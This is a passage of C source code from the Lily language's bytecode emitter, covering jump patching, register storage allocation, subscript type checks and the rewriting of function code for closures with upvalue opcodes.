    emit->code[emit->code_pos + 4] = five;
    emit->code_pos += 5;
}

/*****************************************************************************/
/* Internal helper functions                                                 */
/*****************************************************************************/

/*  opname
    Return a string that represents the given lily_expr_op. */
static char *opname(lily_expr_op op)
{
    static char *opnames[] =
    {"+", "-", "==", "<", "<=", ">", ">=", "!=", "%", "*", "/", "<<", ">>",
     "&", "|", "^", "!", "-", "&&", "||", "=", "+=", "-=", "%=", "*=", "/=",
     "<<=", ">>="};

    return opnames[op];
}

/*  condition_optimize_check
    This is called when lily_emit_eval_condition is called with a tree that
    has type 'tree_literal'. If the given tree is always true, then the
    emitter can optimize the load out.
    Without this, a 'while 1: { ... }' will load "1" and check it at the top
    of every loop...which is rather silly. */
static int condition_optimize_check(lily_ast *ast)
{
    int can_optimize = 1;

    /* This may not be a literal. It could be a user-defined/built-in function
       which would always automatically be true. */
    if (ast->result->flags & ITEM_TYPE_TIE) {
        lily_tie *lit = (lily_tie *)ast->result;

        /* Keep this synced with vm's o_jump_if calculation. */
        int lit_cls_id = lit->type->cls->id;
        if (lit_cls_id == SYM_CLASS_INTEGER && lit->value.integer == 0)
            can_optimize = 0;
        else if (lit_cls_id == SYM_CLASS_DOUBLE && lit->value.doubleval == 0.0)
            can_optimize = 0;
        else if (lit_cls_id == SYM_CLASS_STRING && lit->value.string->size == 0)
            can_optimize = 0;
        else if (lit->type->cls->flags & CLS_VARIANT_CLASS)
            can_optimize = 0;
    }

    return can_optimize;
}

/*  count_inner_try_blocks
    Count the number of 'try' blocks entered where an 'except' has not yet
    been seen. This counts up to the deepest loop block, or the current
    function, whichever comes first. */
static int count_inner_try_blocks(lily_emit_state *emit)
{
    lily_block *block_iter = emit->block;
    int ret = 0;

    while (IS_LOOP_BLOCK(block_iter->block_type) == 0 &&
           (block_iter->block_type & BLOCK_FUNCTION) == 0) {
        if (block_iter->block_type == BLOCK_TRY)
            ret++;

        block_iter = block_iter->prev;
    }

    return ret;
}

/*  write_pop_inner_try_blocks
    This must be called before any 'continue', 'break', or 'return' code is
    emitted. It ensures that the vm will pop the proper number of 'try' blocks
    registered to offset the movement being done. */
static void write_pop_inner_try_blocks(lily_emit_state *emit)
{
    int try_count = count_inner_try_blocks(emit);

    if (try_count) {
        write_prep(emit, try_count);
        int i;
        /* Write exactly one o_pop_try per open 'try' block. */
        for (i = 0;i < try_count;i++)
            emit->code[emit->code_pos+i] = o_pop_try;

        emit->code_pos += try_count;
    }
}

/*  find_deepest_loop
    Look backward from the current block to find the inner-most block that is
    a loop. This block is the one that should receive any 'continue' and
    'break' jumps.

    Success: A block is returned that is a loop block.
    Failure: NULL is returned. */
static lily_block *find_deepest_loop(lily_emit_state *emit)
{
    lily_block *block, *ret;
    ret = NULL;

    for (block = emit->block; block; block = block->prev) {
        if (IS_LOOP_BLOCK(block->block_type)) {
            ret = block;
            break;
        }
        else if (block->block_type & BLOCK_FUNCTION) {
            ret = NULL;
            break;
        }
    }

    return ret;
}

static lily_block *find_deepest_func(lily_emit_state *emit)
{
    lily_block *block;
    lily_block *result = NULL;

    for (block = emit->block; block; block = block->prev) {
        if ((block->block_type & BLOCK_FUNCTION) &&
            block->block_type != BLOCK_FILE) {
            result = block;
            break;
        }
    }

    return result;
}

/*  grow_patches
    Make emitter's patches bigger. */
static void grow_patches(lily_emit_state *emit)
{
    emit->patch_size *= 2;
    emit->patches = lily_realloc(emit->patches,
        sizeof(int) * emit->patch_size);
}

void inject_patch_into_block(lily_emit_state *emit, lily_block *block,
        int target)
{
    if (emit->patch_pos == emit->patch_size)
        grow_patches(emit);

    /* This is the most recent block, so add the patch to the top. */
    if (emit->block == block) {
        emit->patches[emit->patch_pos] = target;
        emit->patch_pos++;
    }
    else {
        /* The block is not on top, so this will be fairly annoying... */
        int move_by, move_start;

        move_start = block->next->patch_start;
        move_by = emit->patch_pos - move_start;

        /* Move everything after this patch start over one, so that there's a
           hole after the last while patch to write in a new one.
*/ memmove(emit->patches+move_start+1, emit->patches+move_start, move_by * sizeof(int)); emit->patch_pos++; emit->patches[move_start] = target; for (block = block->next; block; block = block->next) block->patch_start++; } } void write_block_patches(lily_emit_state *emit, int pos) { int from = emit->patch_pos-1; int to = emit->block->patch_start; for (;from >= to;from--) { /* Skip -1's, which are fake patches from conditions that were optimized out. */ if (emit->patches[from] != -1) emit->code[emit->patches[from]] = pos; } /* Use the space for new patches now. */ emit->patch_pos = to; } static void grow_closed_syms(lily_emit_state *emit) { emit->closed_size *= 2; emit->closed_syms = lily_realloc(emit->closed_syms, sizeof(lily_sym *) * emit->closed_size); } static void grow_match_cases(lily_emit_state *emit) { emit->match_case_size *= 2; emit->match_cases = lily_realloc(emit->match_cases, sizeof(int) * emit->match_case_size); } /* emit_jump_if Write a conditional jump and add it to emitter's current patches. 0 == o_jump_if_false The jump happens if the ast's result is 0/false. 1 == o_jump_if_true The jump happens if the ast's result is non-zero. */ static void emit_jump_if(lily_emit_state *emit, lily_ast *ast, int jump_on) { write_4(emit, o_jump_if, jump_on, ast->result->reg_spot, 0); if (emit->patch_pos == emit->patch_size) grow_patches(emit); emit->patches[emit->patch_pos] = emit->code_pos - 1; emit->patch_pos++; } /* ensure_valid_condition_type This ensures that the resulting value for a condition is one that the vm can determine is true or false. If these are changed, then the vm's o_jump_if should be updated. */ static void ensure_valid_condition_type(lily_emit_state *emit, lily_type *type) { int cls_id = type->cls->id; if (cls_id != SYM_CLASS_INTEGER && cls_id != SYM_CLASS_DOUBLE && cls_id != SYM_CLASS_STRING && cls_id != SYM_CLASS_LIST) lily_raise(emit->raiser, lily_SyntaxError, "^T is not a valid condition type.\n", type); } /* check_valid_subscript Determine if the given var is subscriptable by the type of the given index. Additionally, an 'index literal' is given as a special-case for tuples. This raises an error for unsubscriptable types. 
*/ static void check_valid_subscript(lily_emit_state *emit, lily_ast *var_ast, lily_ast *index_ast) { int var_cls_id = var_ast->result->type->cls->id; if (var_cls_id == SYM_CLASS_LIST) { if (index_ast->result->type->cls->id != SYM_CLASS_INTEGER) lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "list index is not an integer.\n", ""); } else if (var_cls_id == SYM_CLASS_HASH) { lily_type *want_key = var_ast->result->type->subtypes[0]; lily_type *have_key = index_ast->result->type; if (want_key != have_key) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "hash index should be type '^T', not type '^T'.\n", want_key, have_key); } } else if (var_cls_id == SYM_CLASS_TUPLE) { if (index_ast->result->type->cls->id != SYM_CLASS_INTEGER || index_ast->tree_type != tree_literal) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "tuple subscripts must be integer literals.\n", ""); } int index_value = index_ast->literal->value.integer; lily_type *var_type = var_ast->result->type; if (index_value < 0 || index_value >= var_type->subtype_count) { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "Index %d is out of range for ^T.\n", index_value, var_type); } } else { lily_raise_adjusted(emit->raiser, var_ast->line_num, lily_SyntaxError, "Cannot subscript type '^T'.\n", var_ast->result->type); } } /* get_subscript_result Get the type that would result from doing a subscript. tuple_index_lit is a special case for tuples. */ static lily_type *get_subscript_result(lily_type *type, lily_ast *index_ast) { lily_type *result; if (type->cls->id == SYM_CLASS_LIST) result = type->subtypes[0]; else if (type->cls->id == SYM_CLASS_HASH) result = type->subtypes[1]; else if (type->cls->id == SYM_CLASS_TUPLE) { /* check_valid_subscript ensures that this is safe. */ int literal_index = index_ast->literal->value.integer; result = type->subtypes[literal_index]; } else /* Won't happen, but keeps the compiler from complaining. */ result = NULL; return result; } /* Add a new storage to emitter's list of storages. */ static void add_storage(lily_emit_state *emit) { lily_storage *storage = lily_malloc(sizeof(lily_storage)); storage->type = NULL; storage->next = NULL; storage->expr_num = 0; storage->flags = 0; if (emit->all_storage_start == NULL) emit->all_storage_start = storage; else emit->all_storage_top->next = storage; emit->all_storage_top = storage; emit->unused_storage_start = storage; } /* get_storage Attempt to get an unused storage of the type given. Additionally, a line number is required to fix up the line number in case there is an out-of-memory situation. Additionally, this function ensures that emit->unused_storage_start is both updated appropriately and will never become NULL. This returns a valid storage. */ static lily_storage *get_storage(lily_emit_state *emit, lily_type *type) { lily_storage *storage_iter = emit->block->storage_start; int expr_num = emit->expr_num; /* Emitter's linked list of storages is done such that there is always one unused storage at the end. Therefore, this loop will never end with storage_iter == NULL. */ while (storage_iter) { /* If the type is NULL, then nothing is using this storage and it can be repurposed for the current function. */ if (storage_iter->type == NULL) { storage_iter->type = type; storage_iter->reg_spot = emit->function_block->next_reg_spot; emit->function_block->next_reg_spot++; /* This ensures that lambdas don't clobber on current storages. 
*/ if (storage_iter->next) emit->unused_storage_start = storage_iter->next; break; } else if (storage_iter->type == type && storage_iter->expr_num != expr_num) { storage_iter->expr_num = expr_num; break; } storage_iter = storage_iter->next; } storage_iter->expr_num = expr_num; /* This ensures that emit->unused_storage_start is always valid and always something unused. */ if (storage_iter->next == NULL) add_storage(emit); storage_iter->flags &= ~SYM_NOT_ASSIGNABLE; return storage_iter; } /* This attempts to locate a storage, but makes sure that it has never been used before. This is necessary for closures, which dump the source of upvalue into a register (this prevents it from being destroyed early). */ lily_storage *get_unique_storage(lily_emit_state *emit, lily_type *type) { int next_spot = emit->function_block->next_reg_spot; lily_storage *s = NULL; /* As long as the next register spot doesn't change, the resulting storage may be one that is used somewhere else. There's probably a faster, more direct approach, but this is really likely to succeed the first time. */ do { s = get_storage(emit, type); } while (emit->function_block->next_reg_spot == next_spot); return s; } static void close_over_sym(lily_emit_state *emit, lily_sym *sym) { if (emit->closed_pos == emit->closed_size) grow_closed_syms(emit); emit->closed_syms[emit->closed_pos] = sym; emit->closed_pos++; sym->flags |= SYM_CLOSED_OVER; } static int find_closed_sym_spot(lily_emit_state *emit, lily_sym *sym) { int result = -1, i; for (i = 0;i < emit->closed_pos;i++) { if (emit->closed_syms[i] == sym) { result = i; break; } } return result; } static int find_closed_self_spot(lily_emit_state *emit) { int i, result = -1; for (i = 0;i < emit->closed_pos;i++) { lily_sym *s = emit->closed_syms[i]; if ((s->flags & ITEM_TYPE_VAR) == 0) { result = i; break; } } return result; } static void maybe_close_over_class_self(lily_emit_state *emit) { lily_block *block = emit->block; while ((block->block_type & BLOCK_CLASS) == 0) block = block->prev; lily_sym *self = (lily_sym *)block->self; if (find_closed_sym_spot(emit, self) == -1) close_over_sym(emit, self); if (emit->block->self == NULL) emit->block->self = get_storage(emit, self->type); } /* write_build_op This is responsible for writing the actual o_build_list_tuple or o_build_hash code, depending on the opcode given. The list will be put into a register at reg_spot, which is assumed to have the correct type to hold the given result. emit: The emitter holding the function to write to. opcode: The opcode to write: o_build_list_tuple for a list/tuple, or o_build_hash for a hash. first_arg: The first argument to start iterating over. line_num: A line number for the o_build_* opcode. num_values: The number of values that will be written. This is typically the parent's args_collected. reg_spot: The id of a register where the opcode's result will go. The caller is expected to ensure that the register has the proper type to hold the resulting thing. 
*/ static void write_build_op(lily_emit_state *emit, int opcode, lily_ast *first_arg, int line_num, int num_values, int reg_spot) { int i; lily_ast *arg; write_prep(emit, num_values + 4); emit->code[emit->code_pos] = opcode; emit->code[emit->code_pos+1] = line_num; emit->code[emit->code_pos+2] = num_values; for (i = 3, arg = first_arg; arg != NULL; arg = arg->next_arg, i++) emit->code[emit->code_pos + i] = arg->result->reg_spot; emit->code[emit->code_pos+i] = reg_spot; emit->code_pos += 4 + num_values; } static void emit_rebox_value(lily_emit_state *, lily_type *, lily_ast *); /* rebox_variant_to_enum This is a convenience function that will convert the variant value within the given ast to an enum value. Note: If the variant does not supply full type information, then missing types are given the type of 'any'. */ static void rebox_variant_to_enum(lily_emit_state *emit, lily_ast *ast) { lily_type *rebox_type = lily_ts_build_enum_by_variant(emit->ts, ast->result->type); emit_rebox_value(emit, rebox_type, ast); } static lily_storage *emit_rebox_sym(lily_emit_state *emit, lily_type *new_type, lily_sym *sym, uint32_t line_num) { lily_storage *storage = get_storage(emit, new_type); /* Don't allow a bare variant to be thrown into an any until it's thrown into an enum box first. */ if (new_type->cls->id == SYM_CLASS_ANY && sym->type->cls->flags & CLS_VARIANT_CLASS) { lily_type *rebox_type = lily_ts_build_enum_by_variant(emit->ts, sym->type); sym = (lily_sym *)emit_rebox_sym(emit, rebox_type, sym, line_num); } write_4(emit, o_assign, line_num, sym->reg_spot, storage->reg_spot); return storage; } /* emit_rebox_value Make a storage of type 'new_type' and assign ast's result to it. The tree's result is written over. */ static void emit_rebox_value(lily_emit_state *emit, lily_type *new_type, lily_ast *ast) { lily_storage *storage = get_storage(emit, new_type); /* Don't allow a bare variant to be thrown into an any until it's thrown into an enum box first. */ if (new_type->cls->id == SYM_CLASS_ANY && ast->result->type->cls->flags & CLS_VARIANT_CLASS) { rebox_variant_to_enum(emit, ast); } write_4(emit, o_assign, ast->line_num, ast->result->reg_spot, storage->reg_spot); ast->result = (lily_sym *)storage; } /* emit_rebox_to_any This is a helper function that calls emit_rebox_value on the given tree with a type of class any. */ static void emit_rebox_to_any(lily_emit_state *emit, lily_ast *ast) { emit_rebox_value(emit, emit->symtab->any_class->type, ast); } /* setup_types_for_build This is called before building a static list or hash. expect_type is checked for being a generic that unwraps to a type with a class id of 'wanted_id', or having that actual id. If expect_type's class is correct, then the types inside of it are laid down into emitter's ts. They can be retrieved using lily_ts_get_ceiling_type. This processing is done because it's necessary for type inference. Returns 1 on success, 0 on failure. 
*/ static int setup_types_for_build(lily_emit_state *emit, lily_type *expect_type, int wanted_id, int did_resolve) { int ret = 1; if (expect_type && did_resolve == 0 && expect_type->cls->id == SYM_CLASS_GENERIC) { expect_type = lily_ts_easy_resolve(emit->ts, expect_type); did_resolve = 1; } if (expect_type && expect_type->cls->id == wanted_id) { int i; for (i = 0;i < expect_type->subtype_count;i++) { lily_type *inner_type = expect_type->subtypes[i]; if (did_resolve == 0 && inner_type->cls->id == SYM_CLASS_GENERIC) { inner_type = lily_ts_easy_resolve(emit->ts, inner_type); } lily_ts_set_ceiling_type(emit->ts, inner_type, i); } } else ret = 0; return ret; } /* add_var_chain_to_info Add info for a linked-list of vars to the given register info. Functions do not get a register (VAR_IS_READONLY), so don't add them. */ static void add_var_chain_to_info(lily_emit_state *emit, lily_register_info *info, lily_var *from_var, lily_var *to_var) { while (from_var != to_var) { if ((from_var->flags & VAR_IS_READONLY) == 0) { info[from_var->reg_spot].type = from_var->type; info[from_var->reg_spot].name = from_var->name; info[from_var->reg_spot].line_num = from_var->line_num; } from_var = from_var->next; } } /* add_storage_chain_to_info Add info for a linked-list of storages to the given register info. Only used by finalize_function_val. */ static void add_storage_chain_to_info(lily_register_info *info, lily_storage *storage) { while (storage && storage->type) { info[storage->reg_spot].type = storage->type; info[storage->reg_spot].name = NULL; info[storage->reg_spot].line_num = -1; storage = storage->next; } } /* This traverses within emit->code from the initially given start and end positions. This function is concerned with values that are local to this function which have been closed over. * Any read of a local that has been closed over will have a o_get_upvalue written before the opcode. * Any write of a local will have o_set_upvalue written after the opcode. * Jumps encounted are adjusted to account for any get/set_upvalue's written. In most cases, this isn't necessary. However, consider this: define f() { var i = 10 var g = {|| i += 1 } g() i += 1 show(i) } In this case, 'i' should have o_get/set_upvalue written appropriately so that 'i' will come out as 12 (the lambda update being factored in) instead of 11 (using local assigns only). */ static void transform_code(lily_emit_state *emit, lily_function_val *f, int pos, int end, int starting_adjust) { uint16_t *transform_table = emit->transform_table; int jump_adjust = starting_adjust; int jump_pos = -1, jump_end; int output_pos = -1, output_end; /* Do not create a local copy of emit->code here, because the write_4's may cause it to be realloc'd. 
*/ while (pos < end) { int j = 0, op = emit->code[pos]; int c, count, call_type, i, line_num; const int *opcode_data = opcode_table[op]; for (i = 1;i <= opcode_data[1];i++) { c = opcode_data[i + 1]; if (c == C_LINENO) line_num = emit->code[pos + i + j]; else if ((c == C_INPUT || c == C_MATCH_INPUT || (c == C_CALL_INPUT && call_type == 0)) && op != o_create_function) { int spot = emit->code[pos + i + j]; if (transform_table[spot] != (uint16_t)-1) { write_4(emit, o_get_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } else if (c == C_OUTPUT) { int spot = emit->code[pos + i + j]; if (spot != (uint16_t)-1 && transform_table[spot] != -1) { output_pos = i + j; output_end = output_pos + 1; } } else if (c == C_COUNT) count = emit->code[pos + i + j]; else if (c == C_NOP) break; else if (c == C_CALL_TYPE) call_type = emit->code[pos + i + j]; else if (c == C_COUNT_OUTPUTS) { output_pos = i + j; output_end = output_pos + count; j += count - 1; } else if (c == C_JUMP) { /* All of the o_except cases of a single try block are linked together. The last one has a jump position of 0 to mean that it's at the end. Make sure that is preserved. */ if (op != o_except && emit->code[pos + i + j] != 0) { jump_pos = i + j; jump_end = jump_pos + 1; } } else if (c == C_COUNT_JUMPS) { jump_pos = i + j; jump_end = jump_pos + count; j += count - 1; } else if (c == C_COUNT_LIST) { for (j = 0;j < count;j++) { int spot = emit->code[pos + i + j]; if (transform_table[spot] != (uint16_t)-1) { write_4(emit, o_get_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } j--; } else if (c == C_COUNT_OUTPUTS) { output_pos = i + j; output_end = output_pos + count; j += count - 1; } else if (c == C_COUNT_OPTARGS) { count = emit->code[pos + i + j]; /* Optargs is unique in that it contains two kinds of things. The first half are literals, and the second half are register outputs. */ output_pos = i + j + 1 + (count / 2); output_end = i + j + 1 + count; /* Do not do count - 1 because this one includes the size with it since there's no standalone non-counted optargs. */ j += count; } } int move = i + j; write_prep(emit, move); memcpy(emit->code + emit->code_pos, emit->code + pos, move * sizeof(uint16_t)); if (jump_pos != -1) { for (;jump_pos < jump_end;jump_pos++) emit->code[emit->code_pos + jump_pos] += jump_adjust; jump_pos = -1; } emit->code_pos += move; if (output_pos != -1) { for (;output_pos < output_end;output_pos++) { int spot = emit->code[pos + output_pos]; if (spot != (uint16_t)-1 && transform_table[spot] != (uint16_t)-1) { write_4(emit, o_set_upvalue, line_num, transform_table[spot], spot); jump_adjust += 4; } } output_pos = -1; } pos += move; } } /* Consider this: define f(a: integer => function( => integer)) { return {|| a} } The parameter 'a' is used as an upvalue, is never used within the function it is declared in. As a result, there are no writes to transform as a means of putting 'a' into the closure. This solves that by writing an explicit o_set_upvalue where it is needed, before the transform. However, if o_setup_optargs is present, then nothing is written for the parameter (o_setup_optargs will come later, and it will not have a value). */ static void ensure_params_in_closure(lily_emit_state *emit) { lily_var *function_var = emit->block->function_var; int local_count = function_var->type->subtype_count - 1; if (local_count == 0) return; lily_class *optarg_class = emit->symtab->optarg_class; /* The vars themselves aren't marked optargs, because that would be silly. 
To know if something has optargs, prod the function's types. */ lily_type **real_param_types = function_var->type->subtypes; lily_var *var_iter = emit->symtab->active_import->var_chain; while (var_iter != function_var) { if (var_iter->flags & SYM_CLOSED_OVER && var_iter->reg_spot < local_count) { lily_type *real_type = real_param_types[var_iter->reg_spot + 1]; if (real_type->cls != optarg_class) write_4(emit, o_set_upvalue, function_var->line_num, find_closed_sym_spot(emit, (lily_sym *)var_iter), var_iter->reg_spot); } var_iter = var_iter->next; } } static void setup_transform_table(lily_emit_state *emit) { if (emit->transform_size < emit->function_block->next_reg_spot) { emit->transform_table = lily_realloc(emit->transform_table, emit->function_block->next_reg_spot * sizeof(uint16_t)); emit->transform_size = emit->function_block->next_reg_spot; } memset(emit->transform_table, (uint16_t)-1, sizeof(uint16_t) * emit->function_block->next_reg_spot); int i; for (i = 0;i < emit->closed_pos;i++) { lily_sym *s = (lily_sym *)emit->closed_syms[i]; if (s && s->flags & ITEM_TYPE_VAR) { lily_var *v = (lily_var *)s; if (v->function_depth == emit->function_depth) { emit->transform_table[v->reg_spot] = i; /* Each var can only be transformed once, and within the scope it was declared. This prevents two nested functions from trying to transform the same (now-dead) vars. */ emit->closed_syms[i] = NULL; } } } } /* This function is called to transform the currently available segment of code (emit->block->code_start up to emit->code_pos) into code that will work for closures. there are a couple things to do before the transform: * The first part is to setup the emitter's "transform table". This table will map from a var's position in the current function's locals to the position it has in the current closure. This will be used by transform_code. * Depending on where this function is (is it a class method, a nested function, or the top-most function), a different opcode will get written that will become the top of the transformed code. */ static void closure_code_transform(lily_emit_state *emit, lily_function_val *f, int *new_start, int *new_size) { int transform_start = emit->block->code_start; int start = transform_start; int end = emit->code_pos; *new_start = emit->code_pos; int save_code_pos = emit->code_pos; /* To make sure that the closure information is not unexpectedly destroyed, it is stored into a register. get_unique_storage is custom made for this, and will grab a storage that nothing else is using. */ lily_storage *s = get_unique_storage(emit, emit->block->function_var->type); int closed_self_spot = find_closed_self_spot(emit); /* Take note that the new code start will be the current code end + 1. Anything written from here until the code transform will appear at the top of the transformed code. */ if (emit->function_depth == 2) { /* A depth of 2 means that this is the very top function. It will need to create the closure that gets passed down. This is really easy. */ write_4(emit, o_create_closure, f->line_num, emit->closed_pos, s->reg_spot); if (emit->block->block_type & BLOCK_CLASS) { /* Classes are slightly tricky. There are (up to) three different things that really want to be at the top of the code: o_new_instance, o_setup_optargs, and o_function_call (in the event that there is an inherited new). Inject o_new_instance, then patch that out of the header so that transform doesn't write it in again. 
*/ uint16_t linenum = emit->code[start + 1]; uint16_t self_reg_spot = emit->code[start + 2]; write_3(emit, o_new_instance, linenum, self_reg_spot); transform_start += 3; /* The closure only needs to hold self if there was a lambda that used self (because the lambda doesn't automatically get self). */ if (closed_self_spot != -1) { write_4(emit, o_set_upvalue, linenum, closed_self_spot, self_reg_spot); /* This class is going out of scope, so the 'self' it contians is going away as well. */ emit->closed_syms[closed_self_spot] = NULL; } lily_class *cls = emit->block->class_entry; /* This is only set if a class method needed to access some part of the closure through the class. This is likely to be the case, but may not always be (ex: the class only contains lambdas). */ lily_prop_entry *closure_prop; closure_prop = lily_find_property(emit->symtab, cls, "*closure"); if (closure_prop) { write_5(emit, o_set_property, linenum, self_reg_spot, closure_prop->id, s->reg_spot); } } } else if (emit->block->prev && emit->block->prev->block_type & BLOCK_CLASS) { if ((emit->block->block_type & BLOCK_LAMBDA) == 0) { lily_class *cls = emit->block->prev->class_entry; lily_prop_entry *closure_prop = lily_find_property(emit->symtab, cls, "*closure"); lily_class *parent = cls->parent; if (closure_prop == NULL || /* This should yield a closure stored in THIS class, not one that may be in a parent class. */ (parent && closure_prop->id <= parent->prop_count)) closure_prop = lily_add_class_property(emit->symtab, cls, s->type, "*closure", 0); write_5(emit, o_load_class_closure, f->line_num, emit->block->self->reg_spot, closure_prop->id, s->reg_spot); } else { /* Lambdas inside of a class are weird because they don't necessarily have self as their first argument. They will, however, have a closure to draw from. */ write_3(emit, o_load_closure, f->line_num, s->reg_spot); lily_storage *lambda_self = emit->block->self; if (lambda_self) { write_4(emit, o_get_upvalue, *emit->lex_linenum, closed_self_spot, lambda_self->reg_spot); } } } else write_3(emit, o_load_closure, (uint16_t)f->line_num, s->reg_spot); ensure_params_in_closure(emit); setup_transform_table(emit); if (emit->function_depth == 2) emit->closed_pos = 0; /* Closures create patches when they write o_create_function. Fix those patches with the spot of the closure (since they need to draw closure info but won't have it just yet). */ if (emit->block->patch_start != emit->patch_pos) write_block_patches(emit, s->reg_spot); /* Since jumps reference absolute locations, they need to be adjusted for however much bytecode is written as a header. The transform - code_start is so that class closures are accounted for as well (since the o_new_instance is rewritten). */ int starting_adjust = (emit->code_pos - save_code_pos) + (transform_start - emit->block->code_start); transform_code(emit, f, transform_start, end, starting_adjust); *new_size = emit->code_pos - *new_start; } static void create_code_block_for(lily_emit_state *emit, lily_function_val *f) { int code_start, code_size; if (emit->closed_pos == 0) { code_start = emit->block->code_start; code_size = emit->code_pos - emit->block->code_start; } else closure_code_transform(emit, f, &code_start, &code_size); uint16_t *code = lily_malloc((code_size + 1) * sizeof(uint16_t)); memcpy(code, emit->code + code_start, sizeof(uint16_t) * code_size); f->code = code; f->len = code_size - 1; } /* finalize_function_val This is a helper called when a function block is being exited, OR __main__ needs to run. 
In both cases, the register info that the vm needs to init the registers for this function is created. For non-__main__ functions, inner functions are hidden in symtab's old_function_chain, and the vars go out of scope. */ static void finalize_function_val(lily_emit_state *emit, lily_block *function_block) { lily_function_val *f = emit->top_function; /* This must run before the rest, because if 'f' needs to be a closure, it will require a unique storage. */ create_code_block_for(emit, f); int register_count = emit->function_block->next_reg_spot; lily_storage *storage_iter = function_block->storage_start; lily_register_info *info = lily_malloc( register_count * sizeof(lily_register_info)); lily_var *var_stop = function_block->function_var; lily_type *function_type = var_stop->type; /* Don't include functions inside of themselves... */ if (emit->function_depth == 1) var_stop = var_stop->next; if (emit->function_depth != 1) add_var_chain_to_info(emit, info, emit->symtab->active_import->var_chain, var_stop); if (function_type->flags & TYPE_IS_UNRESOLVED) f->has_generics = 1; add_storage_chain_to_info(info, function_block->storage_start); if (emit->function_depth > 1) { /* todo: Reuse the var shells instead of destroying. Seems petty, but malloc isn't cheap if there are a lot of vars. */ lily_var *var_iter = emit->symtab->active_import->var_chain; lily_var *var_temp; while (var_iter != var_stop) { var_temp = var_iter->next; if ((var_iter->flags & VAR_IS_READONLY) == 0) lily_free(var_iter); else { /* This is a function declared within the current function. Hide it in symtab's old functions since it's going out of scope. */ var_iter->next = emit->symtab->old_function_chain; emit->symtab->old_function_chain = var_iter; } /* The function value now owns the var names, so don't free them. */ var_iter = var_temp; } } /* Blank the types of the storages that were used. This lets other functions know that the types are not in use. */ storage_iter = function_block->storage_start; while (storage_iter) { storage_iter->type = NULL; storage_iter = storage_iter->next; } /* Unused storages now begin where the function starting zapping them. */ emit->unused_storage_start = function_block->storage_start; f->reg_info = info; f->reg_count = register_count; } static void leave_function(lily_emit_state *emit, lily_block *block) { /* A lambda block never has to update the return type because the return is whatever the expression in the body returns. */ if (block->block_type & BLOCK_LAMBDA) emit->top_function_ret = emit->top_var->type->subtypes[0]; if (emit->block->class_entry == NULL) { if (emit->top_function_ret == NULL) /* Write an implicit 'return' at the end of a function claiming to not return a value. This saves the user from having to write an explicit 'return'. */ write_2(emit, o_return_noval, *emit->lex_linenum); else if (block->block_type == BLOCK_FUNCTION && block->last_return != emit->code_pos) { /* If this is a function created with 'define', then determine if the last return was the last instruction written. This is the simple way of ensuring that a function always returns a value that stops potential issues at emit-time. */ lily_raise(emit->raiser, lily_SyntaxError, "Missing return statement at end of function.\n"); } } else { /* Constructors always return self. */ write_3(emit, o_return_val, *emit->lex_linenum, emit->block->self->reg_spot); } finalize_function_val(emit, block); /* Information must be pulled from and saved to the last function-like block. This loop is because of lambdas. 
*/ lily_block *last_func_block = block->prev; while ((last_func_block->block_type & BLOCK_FUNCTION) == 0) last_func_block = last_func_block->prev; lily_var *v = last_func_block->function_var; emit->current_class = block->prev->class_entry; /* If this function was the ::new for a class, move it over into that class since the class is about to close. */ if (emit->block->class_entry) { lily_class *cls = emit->block->class_entry; emit->symtab->active_import->var_chain = block->function_var; lily_add_class_method(emit->symtab, cls, block->function_var); } else if (emit->block->block_type != BLOCK_FILE) emit->symtab->active_import->var_chain = block->function_var; /* For file 'blocks', don't fix the var_chain or all of the toplevel functions in that block will vanish! */ if (block->prev->generic_count != block->generic_count && (block->block_type & BLOCK_LAMBDA) == 0) { lily_update_symtab_generics(emit->symtab, NULL, last_func_block->generic_count); } emit->top_function = last_func_block->function_value; emit->top_var = v; emit->top_function_ret = v->type->subtypes[0]; emit->code_pos = block->code_start; emit->function_block = last_func_block; /* File 'blocks' do not bump up the depth because that's used to determine if something is a global or not. */ if (block->block_type != BLOCK_FILE) { if (block->block_type & BLOCK_LAMBDA) emit->lambda_depth--; emit->function_depth--; } } /* eval_enforce_value Evaluate a given ast and make sure it returns a value. */ static void eval_enforce_value(lily_emit_state *emit, lily_ast *ast, lily_type *expect_type, char *message) { eval_tree(emit, ast, expect_type, 1); emit->expr_num++; if (ast->result == NULL) lily_raise(emit->raiser, lily_SyntaxError, message); } /* ensure_proper_match_block This function checks if the current block (verified to be a match block by the caller) has all cases satisfied. Raise SyntaxError if there are missing cases. */ static void ensure_proper_match_block(lily_emit_state *emit) { lily_block *block = emit->block; int error = 0; lily_msgbuf *msgbuf = emit->raiser->msgbuf; int i; lily_class *match_class = block->match_sym->type->cls; for (i = block->match_case_start;i < emit->match_case_pos;i++) { if (emit->match_cases[i] == 0) { if (error == 0) { lily_msgbuf_add(msgbuf, "Match pattern not exhaustive. The following case(s) are missing:\n"); error = 1; } lily_msgbuf_add_fmt(msgbuf, "* %s\n", match_class->variant_members[i]->name); } } if (error) lily_raise_prebuilt(emit->raiser, lily_SyntaxError); } static void push_info_to_error(lily_emit_state *emit, lily_emit_call_state *cs) { char *class_name = "", *separator = "", *kind = "Function"; char *call_name; lily_msgbuf *msgbuf = emit->raiser->msgbuf; int item_flags = cs->error_item->flags; if (item_flags & ITEM_TYPE_VAR) { lily_var *var = (lily_var *)cs->error_item; if (var->parent) { class_name = var->parent->name; separator = "::"; } call_name = var->name; } else if (item_flags & ITEM_TYPE_VARIANT_CLASS) { lily_class *variant_cls = (lily_class *)cs->error_item; call_name = variant_cls->name; if (variant_cls->parent->flags & CLS_ENUM_IS_SCOPED) { class_name = variant_cls->parent->name; separator = "::"; } kind = "Variant"; } else if (item_flags & ITEM_TYPE_PROPERTY) { lily_prop_entry *prop = (lily_prop_entry *)cs->error_item; class_name = prop->cls->name; call_name = prop->name; separator = "."; kind = "Property"; } else { /* This occurs when there's a call of a call, a call of a subscript result, or something else weird. 
